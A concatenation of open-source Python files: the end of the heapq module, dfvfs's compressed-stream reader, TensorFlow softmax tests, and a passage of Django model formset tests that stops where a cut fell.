>>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
[0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]
'''
_heappop, _heapreplace, _StopIteration = heappop, heapreplace, StopIteration
_len = len
h = []
h_append = h.append
for itnum, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
h_append([next(), itnum, next])
except _StopIteration:
pass
heapify(h)
while _len(h) > 1:
try:
while True:
v, itnum, next = s = h[0]
yield v
s[0] = next() # raises StopIteration when exhausted
_heapreplace(h, s) # restore heap condition
except _StopIteration:
_heappop(h) # remove empty iterator
if h:
# fast case when only a single iterator remains
v, itnum, next = h[0]
yield v
yield from next.__self__
# Extend the implementations of nsmallest and nlargest to use a key= argument
_nsmallest = nsmallest
def nsmallest(n, iterable, key=None):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable, key=key)[:n]
"""
# Short-cut for n==1 is to use min() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [min(chain(head, it))]
return [min(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key)[:n]
# When key is none, use simpler decoration
if key is None:
it = zip(iterable, count()) # decorate
result = _nsmallest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(), in2) # decorate
result = _nsmallest(n, it)
return [r[2] for r in result] # undecorate
_nlargest = nlargest
def nlargest(n, iterable, key=None):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, key=key, reverse=True)[:n]
"""
# Short-cut for n==1 is to use max() when len(iterable)>0
if n == 1:
it = iter(iterable)
head = list(islice(it, 1))
if not head:
return []
if key is None:
return [max(chain(head, it))]
return [max(chain(head, it), key=key)]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key, reverse=True)[:n]
# When key is none, use simpler decoration
if key is None:
it = zip(iterable, count(0,-1)) # decorate
result = _nlargest(n, it)
return [r[0] for r in result] # undecorate
# General case, slowest method
in1, in2 = tee(iterable)
it = zip(map(key, in1), count(0,-1), in2) # decorate
result = _nlargest(n, it)
return [r[2] for r in result] # undecorate
if __name__ == "__main__":
# Simple sanity test
heap = []
data = [1, 3, 5, 7, 9, 2, 4, 6, 8, 0]
for item in data:
heappush(heap, item)
sort = []
while heap:
sort.append(heappop(heap))
print(sort)
import doctest
doctest.testmod()
| agpl-3.0 |
log2timeline/dfvfs | dfvfs/file_io/compressed_stream_io.py | 2 | 9519 | # -*- coding: utf-8 -*-
"""The compressed stream file-like object implementation."""
import os
from dfvfs.compression import manager as compression_manager
from dfvfs.file_io import file_io
from dfvfs.lib import errors
from dfvfs.resolver import resolver
class CompressedStream(file_io.FileIO):
"""File input/output (IO) object of a compressed stream."""
# The size of the compressed data buffer.
_COMPRESSED_DATA_BUFFER_SIZE = 8 * 1024 * 1024
def __init__(self, resolver_context, path_spec):
"""Initializes a file input/output (IO) object.
Args:
resolver_context (Context): resolver context.
path_spec (PathSpec): a path specification.
"""
super(CompressedStream, self).__init__(resolver_context, path_spec)
self._compression_method = None
self._file_object = None
self._compressed_data = b''
self._current_offset = 0
self._decompressor = None
self._realign_offset = True
self._uncompressed_data = b''
self._uncompressed_data_offset = 0
self._uncompressed_data_size = 0
self._uncompressed_stream_size = None
def _Close(self):
"""Closes the file-like object.
If the file-like object was passed in the init function
the compressed stream file-like object does not control
the file-like object and should not actually close it.
"""
self._compressed_data = b''
self._file_object = None
self._decompressor = None
self._uncompressed_data = b''
def _GetDecompressor(self):
"""Retrieves the decompressor.
Returns:
Decompressor: decompressor.
"""
return compression_manager.CompressionManager.GetDecompressor(
self._compression_method)
def _GetUncompressedStreamSize(self):
"""Retrieves the uncompressed stream size.
Returns:
int: uncompressed stream size.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
uncompressed_stream_size = 0
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
uncompressed_stream_size += self._uncompressed_data_size
return uncompressed_stream_size
def _Open(self, mode='rb'):
"""Opens the file-like object.
Args:
mode (Optional[str]): file access mode.
Raises:
AccessError: if the access to open the file was denied.
IOError: if the file-like object could not be opened.
OSError: if the file-like object could not be opened.
PathSpecError: if the path specification is incorrect.
"""
if not self._path_spec.HasParent():
raise errors.PathSpecError(
'Unsupported path specification without parent.')
self._compression_method = getattr(
self._path_spec, 'compression_method', None)
if self._compression_method is None:
raise errors.PathSpecError(
'Path specification missing compression method.')
self._file_object = resolver.Resolver.OpenFileObject(
self._path_spec.parent, resolver_context=self._resolver_context)
def _AlignUncompressedDataOffset(self, uncompressed_data_offset):
"""Aligns the compressed file with the uncompressed data offset.
Args:
uncompressed_data_offset (int): uncompressed data offset.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
if uncompressed_data_offset < self._uncompressed_data_size:
self._uncompressed_data_offset = uncompressed_data_offset
break
uncompressed_data_offset -= self._uncompressed_data_size
def _ReadCompressedData(self, read_size):
"""Reads compressed data from the file-like object.
Args:
read_size (int): number of bytes of compressed data to read.
Returns:
int: number of bytes of compressed data read.
"""
compressed_data = self._file_object.read(read_size)
read_count = len(compressed_data)
self._compressed_data = b''.join([self._compressed_data, compressed_data])
self._uncompressed_data, self._compressed_data = (
self._decompressor.Decompress(self._compressed_data))
self._uncompressed_data_size = len(self._uncompressed_data)
return read_count
# Note: that the following functions do not follow the style guide
# because they are part of the file-like object interface.
# pylint: disable=invalid-name
def read(self, size=None):
"""Reads a byte string from the file-like object at the current offset.
The function will read a byte string of the specified size or
all of the remaining data if no size was specified.
Args:
size (Optional[int]): number of bytes to read, where None is all
remaining data.
Returns:
bytes: data read.
Raises:
IOError: if the read failed.
OSError: if the read failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size < 0:
raise IOError('Invalid uncompressed stream size.')
if self._current_offset >= self._uncompressed_stream_size:
return b''
if self._realign_offset:
self._AlignUncompressedDataOffset(self._current_offset)
self._realign_offset = False
if size is None:
size = self._uncompressed_stream_size
if self._current_offset + size > self._uncompressed_stream_size:
size = self._uncompressed_stream_size - self._current_offset
uncompressed_data = b''
if size == 0:
return uncompressed_data
while size > self._uncompressed_data_size:
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[self._uncompressed_data_offset:]])
remaining_uncompressed_data_size = (
self._uncompressed_data_size - self._uncompressed_data_offset)
self._current_offset += remaining_uncompressed_data_size
size -= remaining_uncompressed_data_size
if self._current_offset >= self._uncompressed_stream_size:
break
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
self._uncompressed_data_offset = 0
if read_count == 0:
break
if size > 0:
slice_start_offset = self._uncompressed_data_offset
slice_end_offset = slice_start_offset + size
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[slice_start_offset:slice_end_offset]])
self._uncompressed_data_offset += size
self._current_offset += size
return uncompressed_data
def seek(self, offset, whence=os.SEEK_SET):
"""Seeks to an offset within the file-like object.
Args:
offset (int): offset to seek to.
whence (Optional(int)): value that indicates whether offset is an absolute
or relative position within the file.
Raises:
IOError: if the seek failed.
OSError: if the seek failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if whence == os.SEEK_CUR:
offset += self._current_offset
elif whence == os.SEEK_END:
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size is None:
raise IOError('Invalid uncompressed stream size.')
offset += self._uncompressed_stream_size
elif whence != os.SEEK_SET:
raise IOError('Unsupported whence.')
if offset < 0:
raise IOError('Invalid offset value less than zero.')
if offset != self._current_offset:
self._current_offset = offset
self._realign_offset = True
def get_offset(self):
"""Retrieves the current offset into the file-like object.
Returns:
int: current offset in the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
return self._current_offset
def get_size(self):
"""Retrieves the size of the file-like object.
Returns:
int: size of the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
return self._uncompressed_stream_size
| apache-2.0 |
ppries/tensorflow | tensorflow/python/kernel_tests/softmax_op_test.py | 11 | 6928 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SoftmaxOp and LogSoftmaxOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
import tensorflow as tf
class SoftmaxTest(tf.test.TestCase):
def _npSoftmax(self, features, dim=-1, log=False):
if dim is -1:
dim = len(features.shape) - 1
one_only_on_dim = list(features.shape)
one_only_on_dim[dim] = 1
e = np.exp(features - np.reshape(
np.amax(
features, axis=dim), one_only_on_dim))
softmax = e / np.reshape(np.sum(e, axis=dim), one_only_on_dim)
if log:
return np.log(softmax)
else:
return softmax
def _testSoftmax(self, np_features, dim=-1, log=False, use_gpu=False):
# A previous version of the code checked the op name rather than the op type
# to distinguish between log and non-log. Use an arbitrary name to catch
# this bug in future.
name = "arbitrary"
np_softmax = self._npSoftmax(np_features, dim=dim, log=log)
with self.test_session(use_gpu=use_gpu):
if log:
tf_softmax = tf.nn.log_softmax(np_features, dim=dim, name=name)
else:
tf_softmax = tf.nn.softmax(np_features, dim=dim, name=name)
out = tf_softmax.eval()
self.assertAllCloseAccordingToType(np_softmax, out)
self.assertShapeEqual(np_softmax, tf_softmax)
if not log:
# Bonus check: the softmaxes should add to one in dimension dim.
sum_along_dim = np.sum(out, axis=dim)
self.assertAllCloseAccordingToType(
np.ones(sum_along_dim.shape), sum_along_dim)
def _testAll(self, features):
self._testSoftmax(features, use_gpu=False)
self._testSoftmax(features, log=True, use_gpu=False)
self._testSoftmax(features, use_gpu=True)
self._testSoftmax(features, log=True, use_gpu=True)
self._testOverflow(use_gpu=True)
def testNpSoftmax(self):
features = [[1., 1., 1., 1.], [1., 2., 3., 4.]]
# Batch 0: All exps are 1. The expected result is
# Softmaxes = [0.25, 0.25, 0.25, 0.25]
# LogSoftmaxes = [-1.386294, -1.386294, -1.386294, -1.386294]
#
# Batch 1:
# exps = [1., 2.718, 7.389, 20.085]
# sum = 31.192
# Softmaxes = exps / sum = [0.0320586, 0.08714432, 0.23688282, 0.64391426]
# LogSoftmaxes = [-3.44019 , -2.44019 , -1.44019 , -0.44019]
np_sm = self._npSoftmax(np.array(features))
self.assertAllClose(
np.array([[0.25, 0.25, 0.25, 0.25],
[0.0320586, 0.08714432, 0.23688282, 0.64391426]]),
np_sm,
rtol=1.e-5, atol=1.e-5)
np_lsm = self._npSoftmax(np.array(features), log=True)
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[-3.4401897, -2.4401897, -1.4401897, -0.4401897]]),
np_lsm,
rtol=1.e-5, atol=1.e-5)
def _testOverflow(self, use_gpu=False):
if use_gpu:
type = np.float32
else:
type = np.float64
max = np.finfo(type).max
features = np.array(
[[1., 1., 1., 1.],
[max, 1., 2., 3.]]).astype(type)
with self.test_session(use_gpu=use_gpu):
tf_log_softmax = tf.nn.log_softmax(features)
out = tf_log_softmax.eval()
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[0, -max, -max, -max]]),
out,
rtol=1.e-5, atol=1.e-5)
def testFloat(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float32))
def testHalf(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float16))
def testDouble(self):
self._testSoftmax(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float64))
self._testOverflow()
def test1DTesnorAsInput(self):
self._testSoftmax(
np.array([3., 2., 3., 9.]).astype(np.float64), use_gpu=False)
self._testOverflow(use_gpu=False)
def test3DTensorAsInput(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongFirstDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=0,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongSecondDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=1,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testShapeInference(self):
op = tf.nn.softmax([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]])
self.assertEqual([3, 2, 4], op.get_shape())
def testEmptyInput(self):
with self.test_session():
x = tf.constant([[]], shape=[0, 3])
self.assertEqual(0, tf.size(x).eval())
# reshape would raise if logits is empty
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax(x, dim=0).eval()
def testDimTooLarge(self):
with self.test_session():
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax([1., 2., 3., 4.], dim=100).eval()
def testLargeDims(self):
# Make sure that we properly handle large inputs. See
# https://github.com/tensorflow/tensorflow/issues/4425 for details
for dims in [129, 256]:
ones = np.random.rand(dims, dims).astype(np.float32)
np_softmax = self._npSoftmax(ones)
for use_gpu in [True, False]:
with self.test_session(use_gpu=use_gpu) as sess:
x = tf.placeholder(tf.float32)
y = tf.nn.softmax(x)
tf_softmax = sess.run(y, feed_dict={x: ones})
self.assertAllClose(tf_softmax, np_softmax)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 |
vipul-sharma20/oh-mainline | vendor/packages/Django/tests/modeltests/model_formsets/tests.py | 51 | 61280 | from __future__ import absolute_import, unicode_literals
import datetime
import re
from datetime import date
from decimal import Decimal
from django import forms
from django.db import models
from django.forms.models import (_get_foreign_key, inlineformset_factory,
modelformset_factory)
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from .models import (Author, BetterAuthor, Book, BookWithCustomPK,
BookWithOptionalAltEditor, AlternateBook, AuthorMeeting, CustomPrimaryKey,
Place, Owner, Location, OwnerProfile, Restaurant, Product, Price,
MexicanRestaurant, ClassyMexicanRestaurant, Repository, Revision,
Person, Membership, Team, Player, Poet, Poem, Post)
class DeletionTests(TestCase):
def test_deletion(self):
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': str(poet.pk),
'form-0-name': 'test',
'form-0-DELETE': 'on',
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
formset.save()
self.assertTrue(formset.is_valid())
self.assertEqual(Poet.objects.count(), 0)
def test_add_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
'form-0-id': '',
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 0)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
def test_change_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': six.text_type(poet.id),
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 1)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
class ModelFormsetTest(TestCase):
def test_simple_save(self):
qs = Author.objects.all()
AuthorFormSet = modelformset_factory(Author, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /><input type="hidden" name="form-0-id" id="id_form-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /><input type="hidden" name="form-1-id" id="id_form-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Charles Baudelaire',
'form-1-name': 'Arthur Rimbaud',
'form-2-name': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
author1, author2 = saved
self.assertEqual(author1, Author.objects.get(name='Charles Baudelaire'))
self.assertEqual(author2, Author.objects.get(name='Arthur Rimbaud'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1])
# Gah! We forgot Paul Verlaine. Let's create a formset to edit the
# existing authors with an extra form to add him. We *could* pass in a
# queryset to restrict the Author objects we edit, but in this case
# we'll use it to display them in alphabetical order by name.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=False)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '2', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-name': 'Paul Verlaine',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# Only changed or new objects are returned from formset.save()
saved = formset.save()
self.assertEqual(len(saved), 1)
author3 = saved[0]
self.assertEqual(author3, Author.objects.get(name='Paul Verlaine'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# This probably shouldn't happen, but it will. If an add form was
# marked for deletion, make sure we don't save that form.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=True)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /></p>\n'
'<p><label for="id_form-0-DELETE">Delete:</label> <input type="checkbox" name="form-0-DELETE" id="id_form-0-DELETE" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /></p>\n'
'<p><label for="id_form-1-DELETE">Delete:</label> <input type="checkbox" name="form-1-DELETE" id="id_form-1-DELETE" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" value="Paul Verlaine" maxlength="100" /></p>\n'
'<p><label for="id_form-2-DELETE">Delete:</label> <input type="checkbox" name="form-2-DELETE" id="id_form-2-DELETE" /><input type="hidden" name="form-2-id" value="%d" id="id_form-2-id" /></p>' % author3.id)
self.assertHTMLEqual(formset.forms[3].as_p(),
'<p><label for="id_form-3-name">Name:</label> <input id="id_form-3-name" type="text" name="form-3-name" maxlength="100" /></p>\n'
'<p><label for="id_form-3-DELETE">Delete:</label> <input type="checkbox" name="form-3-DELETE" id="id_form-3-DELETE" /><input type="hidden" name="form-3-id" id="id_form-3-id" /></p>')
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': 'Walt Whitman',
'form-3-DELETE': 'on',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# No objects were changed or saved so nothing will come back.
self.assertEqual(formset.save(), [])
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# Let's edit a record to ensure save only returns that one record.
data = {
'form-TOTAL_FORMS': '4', # the number of forms rendered
'form-INITIAL_FORMS': '3', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Walt Whitman',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-id': str(author3.id),
'form-2-name': 'Paul Verlaine',
'form-3-name': '',
'form-3-DELETE': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# One record has changed.
saved = formset.save()
self.assertEqual(len(saved), 1)
self.assertEqual(saved[0], Author.objects.get(name='Walt Whitman'))
def test_commit_false(self):
# Test the behavior of commit=False and save_m2m
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
meeting = AuthorMeeting.objects.create(created=date.today())
meeting.authors = Author.objects.all()
# create an Author instance to add to the meeting.
author4 = Author.objects.create(name='John Steinbeck')
AuthorMeetingFormSet = modelformset_factory(AuthorMeeting, extra=1, can_delete=True)
data = {
'form-TOTAL_FORMS': '2', # the number of forms rendered
'form-INITIAL_FORMS': '1', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(meeting.id),
'form-0-name': '2nd Tuesday of the Week Meeting',
'form-0-authors': [author2.id, author1.id, author3.id, author4.id],
'form-1-name': '',
'form-1-authors': '',
'form-1-DELETE': '',
}
formset = AuthorMeetingFormSet(data=data, queryset=AuthorMeeting.objects.all())
self.assertTrue(formset.is_valid())
instances = formset.save(commit=False)
for instance in instances:
instance.created = date.today()
instance.save()
formset.save_m2m()
self.assertQuerysetEqual(instances[0].authors.all(), [
'<Author: Charles Baudelaire>',
'<Author: John Steinbeck>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_max_num(self):
# Test the behavior of max_num with model formsets. It should allow
# all existing related objects/inlines for a given object to be
# displayed, but not allow the creation of new inlines beyond max_num.
author1 = Author.objects.create(name='Charles Baudelaire')
author2 = Author.objects.create(name='Paul Verlaine')
author3 = Author.objects.create(name='Walt Whitman')
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, max_num=None, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 6)
self.assertEqual(len(formset.extra_forms), 3)
AuthorFormSet = modelformset_factory(Author, max_num=4, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 4)
self.assertEqual(len(formset.extra_forms), 1)
AuthorFormSet = modelformset_factory(Author, max_num=0, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertEqual(len(formset.extra_forms), 0)
AuthorFormSet = modelformset_factory(Author, max_num=None)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=0)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
AuthorFormSet = modelformset_factory(Author, max_num=4)
formset = AuthorFormSet(queryset=qs)
self.assertQuerysetEqual(formset.get_queryset(), [
'<Author: Charles Baudelaire>',
'<Author: Paul Verlaine>',
'<Author: Walt Whitman>',
])
def test_custom_save_method(self):
class PoetForm(forms.ModelForm):
def save(self, commit=True):
# change the name to "Vladimir Mayakovsky" just to be a jerk.
author = super(PoetForm, self).save(commit=False)
author.name = "Vladimir Mayakovsky"
if commit:
author.save()
return author
PoetFormSet = modelformset_factory(Poet, form=PoetForm)
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Walt Whitman',
'form-1-name': 'Charles Baudelaire',
'form-2-name': '',
}
qs = Poet.objects.all()
formset = PoetFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
poets = formset.save()
self.assertEqual(len(poets), 2)
poet1, poet2 = poets
self.assertEqual(poet1.name, 'Vladimir Mayakovsky')
self.assertEqual(poet2.name, 'Vladimir Mayakovsky')
def test_custom_form(self):
""" Test that model_formset respects fields and exclude parameters of
custom form
"""
class PostForm1(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'posted')
class PostForm2(forms.ModelForm):
class Meta:
model = Post
exclude = ('subtitle',)
PostFormSet = modelformset_factory(Post, form=PostForm1)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
PostFormSet = modelformset_factory(Post, form=PostForm2)
formset = PostFormSet()
self.assertFalse("subtitle" in formset.forms[0].fields)
def test_model_inheritance(self):
BetterAuthorFormSet = modelformset_factory(BetterAuthor)
formset = BetterAuthorFormSet()
self.assertEqual(len(formset.forms), 1)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /></p>\n'
'<p><label for="id_form-0-write_speed">Write speed:</label> <input type="text" name="form-0-write_speed" id="id_form-0-write_speed" /><input type="hidden" name="form-0-author_ptr" id="id_form-0-author_ptr" /></p>')
data = {
'form-TOTAL_FORMS': '1', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-author_ptr': '',
'form-0-name': 'Ernest Hemingway',
'form-0-write_speed': '10',
}
formset = BetterAuthorFormSet(data)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 1)
author1, = saved
